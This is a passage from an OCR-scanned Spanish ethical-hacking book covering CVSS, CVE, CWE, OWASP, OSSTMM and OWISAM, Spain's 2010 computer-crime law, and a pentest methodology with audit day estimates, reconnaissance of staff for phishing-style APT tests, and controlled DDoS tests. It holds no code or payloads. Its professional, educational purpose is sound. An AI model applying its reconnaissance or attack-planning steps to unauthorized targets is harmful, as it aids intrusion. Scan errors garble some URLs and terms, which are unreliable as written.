no  se  clasifican  de  manera  adecuada  las  vulnerabilidades  encontradas. 

Es  importante  recalcar  que  una  vulnerabilidad  que  provoque  una  denegacion  de  servicio  puede 
ser  crltica  si  realmente  el  servicio  que  se  deniega  es  importante  para  la  empresa.  Esta  carencia 
no  pemiite  realizar  una  comparativa  entre  diferentes  evaluaciones,  sobre  todo  cuando  estas 
evaluaciones  ban  sido  llevadas  a  cabo  por  distintos  proveedores  de  seguridad,  utilizando  distintas 
tecnicas,  lierramientas,  pruebas  y  criterios.  Es  fundamental  dentro  de  cualquier  modelo  de  seguridad 
que  los  trabajos  sean  medibles  de  igual  manera  y  que  puedan  ser  comparados,  de  manera  contraria 
no  se  podra  estudiar  el  grado  de  evolucion  real. 

Una  de  las  vi'as  de  resolver  esta  problematica  es  la  que  propuso  MTRE  quien  desarrollo  una  serie 
de  estandares  que  permiten  homogeneizar  las  diferentes  debilidades  que  pueden  existir.  Por  un  lado 
existe  la  Common  Weahiess  Enumeration,  CWE,  y  la  Common  Vulnerabilities  Exposures.  CVE. 
Este  eslandar  se  comentara  mas  en  detalle  en  el  siguiente  apartado. 

Por  lo  general  hay  que  analizar  con  el  maximo  detalle  como  afecta  cada  una  de  las  vulnerabilidades 
a  las  funcionalidades  del  servicio.  Una  vcz  que  sc  haya  determinado  el  numero  de  vulnerabilidades 
y  cuales  son  las  implicaciones,  si  se  detecta  alguna  crltica,  se  deberla  notificar  a  la  mayor  brevedad 
posible,  paraproceder  a  su  coireccion. 

La  descripcion  anterior  se  encuentra  estandarizado  por  el  EIRST,  cuyo  estandar  se  puede  encontrar 
en  la  siguiente  URL  http\ll\v\vw.first.org/cvss/cvss-guideJnmL 


Estandares  y  modelos 

Existen  multitud  de  estandares,  modelos  o  normas  en  el  mundo  de  la  seguridad  y  que  son  aplicables 
en  un  proceso  de  Ethical  Hacking.  Realmente,  utilizar  uno  de  estos  permite  dotar  de  cierta  categoria 
a  los  auditores  o  empresa  que  llevara  a  cabo  dicho  proceso.  En  muchas  ocasiones  las  empresas 
contratantes  de  los  servicios  proporcionan  la  necesidad  de  utilizar  alguno  de  estos  estandares  con 
el  fin  de  homogeneizar  las  comparativas  entre  procesos  llevados  a  cabo  por  distintas  empresas 
auditoras. 

Se  podria  dedicar  el  contenido  de  un  libro  complete  para  definir  y  explicar  cada  uno  de  los  estandares 
y  modelos  presentados  en  este  apartado.  El  objetivo  del  libro  es  proporcionar  un  listado  de  alguno  de 
estos,  proporcionando  al  auditor  una  idea  global  de  lo  que  puede  encontrar  a  dla  de  hoy. 

OWASP,  Open  Web  Application  Securit}'  Project,  es  un  proyecto  de  codigo  abierto  dedicado  a 
detenninar  las  vulnerabilidades  en  el  software.  OWASP  esta  compuesta  por  empresas,  organ izaci ones 
y  particLilares  alrededor  del  mundo.  OWASP  recomienda  enfocar  la  seguridad  de  aplicaciones 
informaticas  considerando  las  dimensiones  de  personas,  procesos  y  tecnologias. 
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OWASP  proporciona  una  guia  de  buenas  practicas  en  el  desarrollo  de  las  aplicaciones  y  un  documento 
de  autoevaluacion,  denominado  OWASP  Top  10.  En  este  documento  se  detallan  las  vulnerabilidades 
mas  comiines  localizadas  en  las  auditorias.  Hay  que  tener  en  cuenta  que  las  vulnerabilidades  como 
inyecciones  SOL  y  los  Cross-Site  Scripting,  XSS,  siempre  suelen  copar  los  primeros  lugares. 

OSSTMK4,  Open  Source  Security'  Testing  Methodology  Manual,  es  una  metodologia,  cuyo  manual 
se  puede  descargar  de  fonna  libre  y  gratuita  del  sitio  web  de  la  ISECOM,  estructurada  en  15 
capitulos  donde  se  explica  como  llevar  a  cabo  las  pruebas  de  auditoria  coiTespondientes  a  distintos 
ambitos.  En  esta  metodologia  se  explica  que  es  un  analisis  de  seguridad,  como  enfocarlo,  cuales 
son  las  metricas  de  seguridad  operativas,  como  se  debe  estructurar  el  flujo  de  trabajo,  las  pruebas 
de  seguridad  que  se  deben  realizar  a  las  personas,  por  ejemplo  en  el  ambito  de  la  ingenieria  social, 
las  pruebas  de  seguridad  en  telecomunicaciones,  wireless,  pruebas  de  seguridad  en  entomos  fisicos, 
de  red.  etcetera.  Es  una  metodologia  muy  completa,  la  cual  puede  ser  estudiada  en  la  siguiente  URL 
hftp://www.  isecom.  org. 

Un  aspecto  importante  que  se  recoge  en  OSSTAdM  es  la  elaboracion  de  infoimes  y  como  se  deben 
general*  estos.  Un  auditor  de  seguridad,  como  se  ha  mencionado  anteriormente,  puede  caer  en  el 
error  de  utilizar  metricas  o  valoraciones  distintas.  Es  decir,  cada  persona  habla  un  lenguaje  distinto. 
por  lo  que  la  comparativa  no  sera  posible.  OSSTA4M  propone  una  via  de  generacion  de  informes 
estandarizada,  por  lo  que  se  facilitara  el  trabajo  desde  el  punto  de  vista  evolutive.  Ademas,  OSSTMM 
es  una  metodologia  certificable,  es  decir,  un  auditor  puede  estar  certificado  en  ella  como  analista, 
tester  o  experto. 

MITRE  desan'ollo  una  serie  de  estandares,  como  se  menciono  en  el  apartado  anterior,  El  primero 
que  se  tratara  es  el  CWE,  Common  Weakness  Enumeration,  el  cual  proporciona  un  marco  uniheado 
para  catalogar  las  vulnerabilidades  de  software.  Las  CWE  pretender  ser  genericas,  por  lo  que  una 
vulnerabilidad  tipificada  bajo  un  CVE  cspecifico  podra  mapearse  contra  alguna  de  las  mas  de  630 
debilidades  base  que  se  encuentran  en  los  CWE.  Estas  debilidades  a  su  vez  se  podran  clasificar  en 
alguna  de  las  mas  de  60  categorias  definidas  por  CWE. 

Por  otro  lado,  los  CVE  son  una  lista  de  infon*naci6n  sobre  vulnerabilidades  conocidas,  donde  cada 
una  dispone  de  una  referencia.  Mediante  esta  via  se  proporciona  a  los  usuarios  de  una  manera  de 
entender  y  proporcionar  al  publico  este  tipo  de  problemas.  El  fon*nato  utilizado  para  identificar  los 
elementos  de  esta  lista  es  el  siguiente  CF^-ID.  El  ID  esta  compuesto  por  YYYY-NNNN,  donde  TDT 
es  el  aho  y  NNNN  el  numero  de  la  vulnerabilidad. 

En  el  ano  2014,  el  formato  de  ID  del  CVE  ha  cambiado,  siendo  los  digitos  de  tipo  N  de  longitud 
variable.  En  otras  palabras,  anteriomente  el  fomiato  era  CK£-YYYY-NNNN,  y  ahora  si  se 
necesitasen  mas  digitos,  por  el  numero  de  vulnerabilidades  conocidas,  se  ahadiria  un  numero  mas 
quedando  asi  CVE-lflTYY-NNNNN,  y  asi  sucesivamente  en  caso  de  necesitarse. 

La  guia  de  CVSS,  proporciona  una  clasificacion  estandarizada  y  normalizada  por  el  FIRST,  con  la 
que  los  auditores  podran  comparar  diferentes  auditorias  con  un  enfoque  real. 

La  guia  se  encuentra  en  la  siguiente  URL  http'.i lwww.first.oig/cv.ss/cvss-guide.html . 
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El  CVSS  proporciona  una  metrica  base  compuesta  por  los  siguientes  elementos: 

-  Vector  de  acceso  o  AV. 

o  Local.  Vulnerabilidades  explotables  en  un  equipo  local. 

o  Red  de  vecinos  o  adyacente.  Vulnerabilidades  explotables  dentro  de  la  niisma  red, 
es  decir,  capa  2. 

o  Remote.  Vulnerabilidades  accesibles  o  explotables  desde  cualqiiier  ubicacion  de 
red. 

-  Complejidad  de  acceso  o  AC. 

o  Alta.  Complejidad,  combinacion  y  circunstancias  muy  especiales. 
o  Media.  Complejidad  de  explotacion  media  para  un  grupo  de  usuarios. 
o  Baja.  Configuracion  por  defecto. 

-  Autenticacion. 

o  Ninguna.  No  se  requiere  autenticacion  para  explotar  la  vulnerabilidad. 
o  Simple.  Se  requiere  una  autenticacion  para  poder  explotar  la  vulnerabilidad. 
o  Multiple.  Se  requieren  varias  autenticaciones  para  poder  explotar  la  vulnerabilidad. 

-  Impacto  en  la  confidencialidad,  es  decir,  si  esta  sc  viera  afectada. 

Impacto  en  la  disponibilidad. 

-  Impacto  en  la  integridad. 

El  CVSS  aporta  una  metrica  de  entonio  que  se  define,  a  grandes  rasgos,  de  la  siguiente  manera: 

-  Distribucion  de  equipos  vulnerables,  es  decir,  si  el  numero  de  equipos  vulnerables  es 
elevado,  o  es  un  caso  aislado. 

-  Daiios  colaterales.  Las  posibilidades  de  que  se  produzcan  perdidas  economicas  o  de 
personas  por  la  vulnerabilidad  detectada. 

-  Requisites  de  seguridad. 

-  Tambien  se  aporta  una  metrica  temporal,  donde  se  especifica  una  ventana  temporal  donde 
se  puede  actuar  tanto  para  la  explotacion,  como  la  correccion  de  la  vulnerabilidad.  Se  define 
de  la  siguiente  manera: 

Explotabilidad.  Existencia  o  no  de  codigo  que  aproveche  la  vulnerabilidad.  es  decir,  si 
existen  exploits. 

-  Dificultad  para  aplicar  una  medida  coiTectora. 

Fiabilidad  del  informe  de  vulnerabilidades.  Como  ejemplo  real  definir  que  en  algunas 
ocasiones  se  anuncia  la  existencia  de  una  vulnerabilidad  pero  no  se  confirma  la  fuente. 

Con  la  clasificacion  que  se  ha  mostrado  este  estandar  CVSS  define  una  serie  de  ponderaciones 
con  la  que  obtener  una  puntuacion  exacta,  la  cual  resultara  muy  util  para  comparar  productos, 
organizaciones,  trabajos  de  auditoria,  etcetera. 
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La  metodologia  OWISAM.,  Open  Wireless  Securit}'  Assesment  Methoclolog}\  proporciona  solucion 
a  la  necesidad  de  definir  y  asignar  controles  de  seguridad  que  se  deben  verificar  sobre  redes  de 
comunicaciones  inalambricas.  De  esta  manera  se  puede  identificar  riesgos  en  este  tipo  de  redes,  y 
aplicar  procedimientos  en  las  auditon'as  de  este  tipo  de  redes.  La  metodologia  OWISAM tiene  como 
enfoque  disehar  una  metodologia  agil  y  utilizable  con  la  que  los  auditores  de  seguridad  puedan 
realizar  un  analisis  exitoso  de  este  tipo  de  redes  en  un  ambito  profesional. 

A  dia  de  hoy,  las  empresas  como  los  analistas  de  seguridad  no  disponen  de  una  metodologia 
estandarizada  con  el  que  analizar  y  clasificar  los  riesgos  de  las  redes  wireless.,  por  lo  que  OWISAM, 
una  metodologia  joven,  proporciona  solucion  al  problema  comentado. 

Los  controles  que  utiliza  la  metodologia  OWISAM  ^on  todas  aquellas  verifieaciones  tecnicas  que 
deben  ser  llevadas  a  cabo  para  analizar  los  riesgos  de  este  tipo  de  redes  y  son  los  siguientes: 

-  Descubrimientodedispositivos.  Recopilacion  de  infomiacion  sobre  las  redes  inalambricas. 

-  Fingerprinting.  Comprobacion  y  analisis  de  funcionalidades  de  los  dispositivos  de 
comunicaciones. 

-  Pmebas  de  autenticacion. 

-  Cifrado  de  las  comunicaciones. 

-  Verifieacion  de  la  configuracion  de  las  redes. 

Pruebas  de  control  de  la  seguridad  sobre  la  infraestructura  wireless. 

-  Controles  orientados  a  verificar  la  disponibilidad  del  entonio,  es  decir.  pruebas  de 
denegacion  de  servicio. 

Pruebas  sobre  di recti vas  del  uso  de  las  redes  wireless. 

Pruebas  sobre  los  clientes  inalambricos. 

-  Pruebas  sobre  hotspots  y  portales  cautivos. 

Otros  conceptos  como  el  modelo  Defensa  en  Profiindidad,  abanderado  de  Microsoft,  y  la  ISO  27001 , 
son  otros  que  proporcionarian  un  gran  volumen  de  infomiacion.  Son  totalmente  rec  omen  dados  para 
SLi  estudio  y  su  puesta  en  practica  en  un  entorno  profesional. 


Ley  Hacking  23  de  Diciembre  de  2010 

El  23  de  Diciembre  de  201 0  entro  en  vigor  la  reforma  del  codigo  penal,  el  cual  fue  modificado  por  la 
Ley  Organica  5/20 1 0  de  22  de  Junio.  En  estanueva  refonna  legal  se  lipifica  como  delitos  infonnaticos 
especificos,  limitando  la  accion  de  los  investigadores  de  seguridad  infonnatica  y  responsabilizando  a 
las  empresas.  Por  lo  que  las  empresas  seran  las  personas  juridicas  de  las  acciones  de  sus  empleados. 

Esta  actualizacion  supuso  una  ampliacion  del  catalogo  de  delitos  informaticos,  cl  cual  es  necesario 
conocer  cuando  se  ejerce  una  profesion  concreta,  pero  no  es  suficiente  para  cubrir  todo  el  abanico  de 
delitos  que  pueden  surgir  hoy  en  dia  en  el  mundo  de  la  seguridad  infomiatica.  Esta  ley  no  modified 
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algunos  delitos  graves,  como  por  ejemplo  el  de  la  pomografia  infantil  o  suplantacion  de  identidad, 
entre  otros. 

Las  empresas,  personas  juridicas,  son  responsables  de  estafas  y  delitos  informaticos  cometidos  por 
sus  empleados.  Esta  afirmacion  es  asi,  siempre  que  se  demuestre  que  las  empresas  no  ban  implantado 
medidas  de  control  intemo  necesarias  para  impedir  estos  incidentes.  Si  una  empresa  fliera  adquirida 
por  otra,  la  responsabilidad  se  traslada  a  la  nueva  empresa  resultante.  Por  supuesto,  la  empresa  es 
responsable  del  delito  cuando  no  es  posible  determinar  quien  es  el  autor  del  delito,  incluso  cuando 
el  autor  haya  fallecido. 

Las  sanciones  que  pueden  afectar  a  las  empresas  son  muy  distintas,  pudiendo  ir  desde  una  multa 
pequena  hasta  la  propia  disolucion  de  la  sociedad.  Esto  es  independiente  de  la  responsabilidad  que 
tenga  el  empleado,  persona  fisica.  En  otras  palabras,  sancionados  seran  tanto  la  empresa  como  el 
empleado  causante  del  delito. 

La  reforma  solo  afectaba  a  las  empresas  privadas,  estando  el  sector  publico  exento  de  dichas 
responsabilidades  penales.  El  Estado  y  las  Administraciones  se  les  eximen  de  toda  posible  culpa  en 
un  delito  informatico.  Los  partidos  politicos  no  pagaran  por  las  acciones  de  sus  empleados. 

Otra  de  las  cosas  imporlantes  que  marca  esta  Ley  del  ano2010  es  que  la  deteccion  de  vulnerabilidades 
infonnaticas  se  convieite  en  un  delito.  Cualquier  persona  que  detecte  vulnerabilidades  en 
aplicaciones  o  sitios  web  sin  consentimiento  explicito  de  los  interesados,  en  este  caso  el  propietario 
de  la  aplicacion,  piiede  acabar  con  consecuencias  legales.  El  Codigo  Penal  sanciona  el  uso  de  las 
nuevas  tecnologias  de  la  infomiacion  para  invadir  o  atenlar  contra  la  intimidad  de  las  personas. 
En  otras  palabras,  realizar  un  acceso  no  consentido,  sin  autorizacion,  vulnerando  un  sistema  de 
autenticacion  sera  sancionado,  aunque  no  exista  intencion  de  cometer  un  delito.  El  usuario  que 
comete  este  delito  puede  ser  sancionado  con  una  pena  de  prision  de  entre  seis  meses  y  dos  anos. 

Los  empleados  dedicados  a  la  seguridad  informatica  deben  conocer  esta  Ley,  y  todas  las  consecuencias 
que  pueden  ocuiTir  en  el  incumplimiento  de  ella.  Es  recomendable  que  los  empresarios  al  contratar 
a  los  empleados  infonnen  y  dediquen  tiempo  en  que  los  profesionales  de  la  seguridad  entiendan 
el  ambito  en  el  que  se  encuentran  y  a  las  leyes  que  estan  sujetos  sus  puestos  de  trabajo.  Se  puede 
entender  que  este  Codigo  Penal  situa  en  el  mismo  escalafon  a  un  investigador  de  seguridad  que  a  un 
delincuente  que  se  aprovecha  de  las  vulnerabilidades  para  obtener  un  beneficio. 


5.  Metodologia 

El  enfoque  de  este  libro  es  el  de  proporcionar  al  lector  una  metodologia  basada  en  la  experiencia,  en 
buenas  practicas  y  estandares  para  llevar  a  cabo  proyectos  o  procesos  de  Ethical  Hacking. 

Un  proceso  de  Ethical  Hacking  recorre  ciertas  practicas  enfocadas  a  las  distintas  pruebas  que  se 
deberan  realizar  para  satisfacer  la  demanda  del  cliente.  En  otras  palabras,  el  proceso  puede  ser 
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dividido  en  etapas  que  seran  semejantes  para  las  distintas  auditorias,  y  agregados  al  proceso 
comentados  anterionnente,  de  las  que  puede  consistir  el  Ethical  Hacking. 


El  equipo  de  auditoria 

En  toda  propuesta  para  realizar  un  proceso  de  Ethical  Hacking  se  debe  explicar  la  composicion  del 
equipo  de  auditoria  que  participara  en  el  proceso.  Ademas,  es  importante  reflejar  las  caracteristicas 
de  cada  uno  de  los  integrantes  del  equipo,  y  por  supuesto,  reflejar  que  cada  integrante  del  equipo 
aporta  un  punto  de  vista  distinto,  siendo  experto  en  una  rama  concreta  de  seguridad. 

Siempre  existira  un  responsable  al  cargo  del  proyeclo,  el  cual  seguramente  hard  tareas  de  interlocucion 
con  los  responsables  del  proyecto  por  parte  de  la  empresa  contratante.  A  continuacion  se  especifica 
detalles  que  son  interesantes  incluir  en  la  descripcion  de  los  integrantes: 

-  Cargo  en  la  empresa. 

-  Titulaciones  disponibles  de  cada  integrante. 

-  Charlas  y  conferencias  internacionales/nacionales  realizadas. 

Certificaciones  de  seguridad  que  tiene  cada  integrante  del  equipo. 

-  Certificaciones  infonnaticas  disponibles. 

-  Experiencia  cuantitativa  en  anos  de  cada  miembro  del  equipo. 

-*  Proyectos  similares  al  que  se  presentan  en  los  que  ban  parlicipado. 

-  Premios  individuales  de  cada  integrante,  si  los  disponen,  tanlo  academicos,  como 
profesionales. 

-  Valores  anadidos. 


Alcance  del  proyecto 

Independientemente  de  la  auditoria  o  agregado  de  un  proceso  de  Ethical  Hacking.,  siempre  se  debe 
realizar  distintos  tipos  de  alcance  de  proyecto.  Si  una  empresa  contrata  el  servicio  ilt  Ethical  Hacking 
que  comprenda  varios  procesos  de  auditoria,  por  ejemplo  una  interna,  perimetral  y  una  prueba  de 
APT.,  se  debera  generar  distintos  tipos  de  alcances  de  proyecto. 

En  otras  palabras,  se  debera  estiidiar  el  alcance  del  proyecto  global,  especificando  las  tareas 
comprendidas,  y  los  distintos  alcances  de  proyecto  de  los  distintos  procesos  de  auditoria.  Ademas,  se 
debe  indicar  el  numero  de  joniadas  efectivas  para  llevar  a  cabo  las  distintas  auditorias,  proporcionando 
un  valor  final  en  jornadas,  el  cual  sera  presupuestado. 

En  el  alcance  del  proyecto  se  especificara  la  via  de  comunicacion  y  notificacion  entre  la  empresa  que 
ofrece  el  servicio  y  la  contratante.  En  otras  palabras,  se  especificara  ante  que  situacion  la  empresa 
que  realiza  el  proceso  debera  notificar  vulnerabilidades  detectadas,  y  cual  es  la  via  para  llevar  a  cabo 
las  notificaciones,  por  ejemplo  utilizando  el  correo  electronico,  mediante  el  uso  de  claves  PGP,  para 
proteger  la  confidencialidad  de  los  documentos. 
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La  estiinacion  de  jomadas  es  uno  de  los  puntos  criticos  del  proyecto.  Suponiendo  el  ejempio  anterior 
en  el  qiie  el  proyecto  de  Ethical  Hacking  esta  compuesto  por  iina  aiiditon'a  intenia  realizada  a  dos 
segmentos  de  red,  una  auditoria  perimetral  a  un  dominio  y  servicios  publicos  de  una  empresa  objeto. 
y  por  ultimo  la  prueba  de  APT  a  un  grupo  de  personas  pertenecientes  a  la  empresa  objeto  de  la 
auditoria,  se  debe  estimar  un  niimero  de  jornadas  con  los  recursos,  consultores,  que  dispone  la 
empresa  para  realizar  las  distintas  tareas  en  un  tiempo  determ inado. 


Para  este  ejempio  se  especifican  las  siguientes  tablas: 


Tareas  (Auditoria  interna) 

Jornadas 

Recoleccion  infomiacion  del  entorno  intemo 

0,5 

Enumeracion  de  recursos  en  el  entorno  interno 

1 

Fijacion  de  objetivos 

0,5 

Pruebas  de  auditoria  interna  (2  Segmentos  de  red  -  Desplazamientos 

horizontales  —  verticales) 

3 

Generacion  de  infonnes 

2 

TOTAL: 

7 

Tabla  I.Ol:  Estiinacion  jomadas  en  auditoria  interna. 


Tarea  (Auditoria  perimetral) 

Jornadas 

Recuperacion  y  recogida  de  informacion 

1 

Detenninacion  de  topologia 

1 

Identificacion  y  confirmacion  de  vulnerabilidades 

2 

Escalado  de  privilegios  y  avance 

2 

Analisis  de  aplicativos 

2 

Generacion  de  informes 

1 

TOTAL: 

9 

Tabla  1.02:  Estimacion  jomadas  en  auditoria  pcriinetraL 


Tarea  {APT) 

Jornadas 

Identificacion  de  con*eos  electronicos 

0,5 

Analisis  y  envio  de  coireos  electronicos  (Posibles  pruebas) 

2 

Generacion  de  informes 

1 

TOTAL: 

3,5 

Tabla  1.03:  Estiinacion  jornadas  en/lPTi 


Tarea  (Global) 

Jornadas 

Test  de  intrusion  perimetral 

9 

Advanced  Persistent  Threat 

3,5 

Test  de  intrusion  intemo 

7 

TOTAL: 

19,5 

Tabla  1 .04:  Estimacion  global  de  Ethical  Hacking. 
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Por  ultimo,  el  alcance  del  proyecto  puede  indicar  cuantos  contactos  se  realizaran  al  dia  con  la 
empresa  contratante  para  informar  de  las  pruebas  realizadas.  Tambien  puede  ser  necesario  indicar 
las  pruebas  que  se  realizaran  a  corto  plazo,  con  el  fin  de  notificar  posibles  peligros  de  calidad 
de  seiTicio  en  ciertas  pruebas  criticas.  coino  denegaciones  de  sei-vicio  o  escaneos  intensivos  de 
auditorias  perimetrales. 


Seleccion  e  informacion  del  objetivo 

En  todo  proceso  dentro  del  Ethical  Hacking  existe  una  etapa  donde  el  auditor  dedicara  tiempo  a  la 
seleccion  e  informacion  del  objetivo.  En  otras  palabras,  es  totalmente  necesario  conocer  el  entorno 
al  que  se  enfrenta  el  auditor  para,  una  vez  analizado  y  entendido  exponer  las  pruebas  de  evaluacion 
de  seguridad. 

Esta  primera  etapa  dependera  del  objeto  de  la  auditoria  o  proceso  agregado  al  que  se  enfrente 
el  auditor.  Es  decir,  si  se  esta  realizando  una  auditoria  perimetral,  logicamente  la  recogida  de 
informacion  sera  distinta  que  si  se  esta  llevando  a  cabo  una  auditoria  interna.  En  miichas  ocasiones 
la  recogida  de  informacion  sera  muy  distinta,  ya  que  un  enlomo  interne  es  muy  distinto  al  entorno 
perimetral,  o  por  ejempio,  un  prueba  de  APT  o  DDOS  requieren  una  recogida  de  informacion  muy 
distinta  a  una  auditoria  perimetral. 

Pero  cxislen  elementos  que  pueden  ser  extrapolados  con  el  fin  de  enfocar  la  parte  metodologica.  En 
mayor  o  menor  medida  existe  una  etapa  de  recogida  de  informacion  global,  en  la  que  el  auditor  se 
nutrira  de  informacion  piiblica,  en  el  caso  de  una  auditoria  perimetral,  o  de  las  especificaciones  que 
se  le  digan  en  una  auditoria  interna. 

Para  simplificar  y  ejemplificar  lo  comentado  se  realiza  un  resumen  que  indiqiie  que  tipo  de 
informacion  se  necesita  en  cada  auditoria  o  proceso  agregado; 

-  La  auditoria  perimetral  dispone  de  las  fases  footprinting  y  fingerprinting  con  las  que 
se  realiza  una  recogida  de  informacion  global  y  publica  en  Internet,  para  despues  analizarla 
y  determinar  que  roles  disponen  los  sistemas  perimetrales,  puertos  abiertos,  versiones  de 
productos  publicas,  sistemas  operatives,  servicios,  etcetera. 

La  auditoria  interna  dispone  de  una  fase  de  recogida  de  informacion  donde  se  detennina 
la  lopologia  de  la  red,  conectividad  directa  con  maquinas  adyacentes,  versiones  de  productos, 
sistemas  operatives,  puertos  abiertos,  servicios,  etcetera.  Como  se  puede  observar,  existe  un 
paralelismo  con  la  auditoria  perimetral,  aunque  el  ambito  de  trabajo  y  la  vision  de  estas  sean 
totalmente  distinto. 

La  auditoria  de  caja  blanca  lleva  esta  fase  implicita.  La  parte  contratante  indicara  de  que 
cquipos  y  sistemas  se  debe  realizar  la  muestra  de  configuraciones  y  las  credenciales  con 
privilegios  a  utilizar.  Realmente  es  esta  informacion  la  que  se  necesita  en  esta  fase,  y  sera 
otorgada  por  la  propia  empresa  contratante  del  servicio. 

-  La  prueba  de  stress  dedicada  a  realizar  un  DDOS  dispone  de  esta  fase  en  distinta  medida. 
En  algunas  ocasiones  los  encargados  de  llevar  a  cabo  dicha  pmeba  se  reunen  con  la  empresa 
contratante  para  decidir  las  ventanas  temporales  sobre  las  que  sera  llevado  a  cabo  el  ataque. 
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Hay  que  tener  en  cuenta  que  el  ataque  es  real,  y  debe  estar  controlado  y  ser  ejecutado  en 
una  ventana  temporal  que  no  afecta,  o  afecte  lo  minimo,  a  la  empresa  contratante.  Esta 
informacion  es  vital,  por  parte  de  los  auditores  se  puede  llevar  a  cabo  una  fase  Atfoolprmtwg 
y  fingerprinting  con  el  fin  de  conocer  mejor  la  infraestructura  perimetral  de  la  empresa,  y 
analizar  por  donde  llevar  el  ataque  DDOS. 

-  La  prueba  de  APT  dedica  una  de  sus  fases  a  la  recoleccion  de  infomaacion  piiblica  de 
las  personas  que  formaran  el  grupo  objetivo  de  la  accion.  La  infonTiacion  se  obtendra,  en  su 
mayoria  gracias  a  Internet  y  sus  buscadores,  servicios  como  Linkedin  o  Xing  pueden  ayudar 
a  obtener  la  informacion  de  nombres  reales  y  puestos  de  trabajo  de  la  empresa  objeto.  Las 
flientes  de  infonnacion  pueden  ser  desde  correos  que  se  envian  con  la  empresa  objeto  para 
conocer  el  estilo  de  estos  y  poder  hacer  las  pruebas  mas  reales,  e-mads  que  son  publicos  en 
los  sitios  web,  Linkedin,  etcetera.  Una  vez  recolectada  la  informacion  sobre  las  personas 
que  seran  el  objetivo  de  la  prueba  se  da  por  finalizada  la  fase  y  se  estudia  los  distintos  de 
aiTienazas  a  los  que  se  expondran  a  dichas  personas. 

-  La  fiiga  de  informacion  se  puede  entender  como  un  agregado  a  la  auditoria  inmma.  Poi 
lo  que  la  recogida  de  informacion  se  realiza  exactamente  igual  que  en  la  auditoria  interna. 
Las  henamientas  inlernas  para  descubrir  servicios,  sistemas  operativos,  puertos,  versiones 
ayudaran  al  auditor  en  esta  fase  de  la  prueba. 

-  Las  pruebas  wireless  y  VOIP  disponen  de  una  fase  de  reconocimiento  del  entomo  y 
descubrimiento  de  infraestructura.  En  el  caso  de  la  auditoria  wireless  se  utilizan  analizadores 
del  medio,  como  airodwnp-ng,  para  visualizar  los  tipos  de  cifrado,  el  numero  de  puntos 
de  acceso  que  tiene  la  red  de  la  empresa,  los  canales  por  los  que  se  emiten,  el  numero  de 
clientes  conectados  y  a  que  puntos  de  acceso,  la  calidad  de  la  serial,  etcetera.  Todo  este  tipo  de 
informacion  dara  infonnacion  al  auditor  el  cual  podra  analizarla  y  llevar  a  cabo  las  acciones 
necesarias.  En  el  caso  de  la  auditoria  VOIP,  la  recogida  de  informacion  y  detenninacion  de 
topologia  es  mas  similar  a  la  auditoria  interna. 


Confeccion  del  ataque  e  intrusion  controlada:  Ampliacion  de  miras 

En  todas  las  pruebas  que  pueden  constituir  el  proceso  o  Ethical  Hacking  hay  una  fase  en  la  que 
el  auditor  realizara  distintos  ataques  con  distintos  enfoques  u  objetivos.  Todos  ellos  tienen  una 
caracteristica  comiin  y  es  que  todas  estas  pruebas  deben  estar  bajo  control  de  la  empresa  y  grupo  de 
auditores  que  realizan  los  ataques.  En  ningiin  instante  el  auditor  puede  perder  el  control  de  la  prueba 
que  esta  realizando,  ya  que  esto  podria  causar  danos  a  la  empresa  contratante,  la  que  demanda  el 

servicio. 

En  las  distintas  pruebas  del  proceso  debemos  confeccionar  una  serie  de  pruebas  que  se  realizaran. 
buscando  la  automatizacion  en  las  tareas  del  auditor.  Pero  la  realidad  es  diterente,  y  se  sabe  que 
los  sistemas  de  cada  empresa  son  distintos  y  con  entomos  y  circunstancias  diterentes,  por  ello  no 
siempre  se  podra  utilizar  un  checklisi  de  pruebas. 

En  un  alto  porcentaje  se  puede  crear  dicho  checklist,  aunqiie  la  experiencia  del  auditor  y  el 
conocimiento  de  las  diferentes  tecnologias  a  las  que  el  auditor  se  puede  enfrentar  es  algo  vital  para 
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completar  el  abanico  de  pruebas.  A  continuacion  se  especifican  ejemplos  de  diversas  pruebas  y  el 
objetivo  global  de  los  ataques  realizados  a  las  distintas  infraestructuras  o  usuarios: 

-  En  auditorias  perinietrales  el  objetivo  es  estudiar  el  nivel  de  seguridad  de  los  elementos  que 
se  encuentran  publicos  por  parte  de  la  empresa.  Una  de  las  auditorias  que  pueden  componer 
parte  0  todo,  segun  el  cliente,  de  esta  seccion  es  la  auditoria  web.  Cojno  ejeinplo  de  pruebas 
que  se  pueden  realizar  en  las  auditorias  perinietrales  se  encuentran:  verificacion  y  validacion 
de  las  coniLinicaciones,  validacion  de  entradas,  manipulacion  de  parametros,  autenticacion 
y  gestion  de  sesiones,  estudio  de  algoritmos  criptograficos,  configuraciones,  etcetera.  Cada 
apartado  anterior  esta  compuesto  por  distintas  pruebas  que  deben  ser  disenadas,  en  esta 
fase,  en  funcion  de  los  resultados  obtenidos  en  la  fase  anterior.  De  este  modo  se  sabe  que  el 
analisis  funcional  de  los  resultados  obtenidos  anteriormente,  y  el  diseno  de  pruebas,  a  partir 
de  pruebas  utilizadas  siempre  y  algunas  que  pueden  surgir  de  la  experiencia  del  auditor,  se 
deben  llevar  a  cabo  en  este  instante. 

-  La  auditoria  interna  tiene  como  objetivo  obtener  el  maximo  de  infonnacion  sensible 
desde  la  propia  red  interna  de  la  organizacion.  Este  tipo  de  pruebas  estan  encaminadas 
al  conocimiento  y  descubrimiento  de  la  implementacion  de  la  red,  el  conocimiento  del 
funcionamienlo  de  prolocolos  de  autenticacion  y  servicios  de  la  plalaforma  que  utilicc  la 
organizacion,  utilizacion  de  ataques  para  movimiento  lateral  u  horizontal  y  vertical  entre 
maquinas,  y  explotacion  de  vulnerabilidadcs  encontradas  en  versiones  de  productos  o 
aplicaciones  intenias. 

-  La  auditoria  de  caja  blanca,  en  este  punto,  tiene  como  objetivo  el  comprobar  el  estado 
de  las  configuraciones  optimas,  enfocadas  a  la  seguridad.  En  algunos  casos,  la  seguridad  se 
enfrenta  a  la  productividad  o  viabilidad  del  negocio,  por  lo  que  el  auditor  se  puede  encontrar 
este  heclio,  que  seguramente  haga  que  el  nivel  de  seguridad  sea  rebajado,  siendo  el  riesgo 
aceptado  por  la  direccion  de  la  empresa. 

La  prueba  de  stress  tiene  como  objetivo  verificar  la  resistencia,  o  incluso  resiliencia,  que 
puede  tener  una  organizacion  y  su  infraestructura  publica  frente  a  un  ataque  de  dencgacion 
de  servicio  distribuido.  Quiza  sea  este  tipo  de  pruebas  donde  el  auditor  debe  disponer  en  todo 
instante  el  control  de  lo  que  esta  realizando,  y  la  posibilidad  de  parar  el  ataque,  ya  que  si  la 
infraestructura  de  la  organizacion  cae  se  debera  detener  la  prueba,  para  que  la  organizacion 
